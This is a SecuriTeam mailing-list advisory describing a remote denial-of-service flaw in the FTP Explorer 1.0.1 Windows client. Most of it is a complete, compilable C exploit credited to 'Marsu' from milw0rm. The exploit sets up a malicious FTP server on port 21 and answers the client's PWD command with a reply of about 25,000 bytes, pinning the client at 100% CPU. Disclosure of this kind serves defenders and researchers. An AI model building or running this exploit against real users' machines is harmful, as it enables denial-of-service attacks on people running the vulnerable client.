[EXPL] FTP Explorer Remote DoS (Exploit, CPU consumption)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



FTP Explorer Remote DoS (Exploit, CPU consumption)
------------------------------------------------------------------------


SUMMARY

<http://www.ftpx.com/> FTP Explorer is "a file transfer protocol client
for Windows 98/ME/2000/XP and NT 4.0, that looks and acts very much like
the Windows Explorer, offering a fun way to FTP. FTP Explorer is the
original 'explorer style' FTP client for Windows". A vulnerability in FTP
Explorer allows remote attackers to cause the program to consume large
amounts of CPU time by sending it an overly large PWD response.

DETAILS

Exploit:
/*****************************************
* FTP Explorer 1.0.1 Build 047 Remote DoS (CPU consumption)
*
*
*
* FTP Explorer is prone to a DoS after receiving a long PWD response
leading to *
* 100% CPU consumption.
*
* Have Fun!
*
*
*
* Coded by Marsu <Marsupilamipowa@xxxxxxxxxx>
*
******************************************/



#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#include "windows.h"
#pragma comment(lib, "ws2_32.lib")

int main(int argc, char* argv[])
{
char recvbuff[1024];
char evilbuff[30000];
sockaddr_in sin;
int server,client;
WSADATA wsaData;
WSAStartup(MAKEWORD(1,1), &wsaData);

server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = htonl(INADDR_ANY);
sin.sin_port = htons( 21 );
bind(server,(SOCKADDR*)&sin,sizeof(sin));

printf("[+] FTP Explorer Remote CPU consumption DoS\n");
printf("[+] Coded and discovered by Marsu
<Marsupilamipowa@xxxxxxxxxx>\n");
printf("[*] Listening on port 21 ...\n");
listen(server,5);
printf("[*] Waiting for client ...\n");
client=accept(server,NULL,NULL);
printf("[+] Client connected\n");
memcpy(evilbuff,"220 Hello there\r\n\0",18);

if (send(client,evilbuff,strlen(evilbuff),0)==-1)
{
printf("[-] Error in send!\n");
exit(-1);
}

//USER
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"331 \r\n\0",7);
send(client,evilbuff,strlen(evilbuff),0);

//PASS
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"230 \r\n\0",7);
send(client,evilbuff,strlen(evilbuff),0);

//SYST
memset(recvbuff,'\0',1024);
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"215 WINDOWS\r\n\0",14);
send(client,evilbuff,strlen(evilbuff),0);

//PWD
int i=5;
memset(recvbuff,'\0',1024);
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
while (i<25000) {
memset(evilbuff+i,'a',1);
i++;
memset(evilbuff+i,'/',1);
i++;
}
memcpy(evilbuff,"257 \"",5);
memcpy(evilbuff+25000,"\"\r\n\0",4);
send(client,evilbuff,strlen(evilbuff),0);

Sleep(100);
printf("[+] Must be 100%% CPU consuming\n");
closesocket(client);
closesocket(server);
return 0;

}

// milw0rm.com [2007-02-20]


ADDITIONAL INFORMATION

The information has been provided by <mailto:Marsupilamipowa@xxxxxxxxxx>
Marsu.
The original article can be found at:
<http://www.milw0rm.com/exploits/3347>
http://www.milw0rm.com/exploits/3347



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages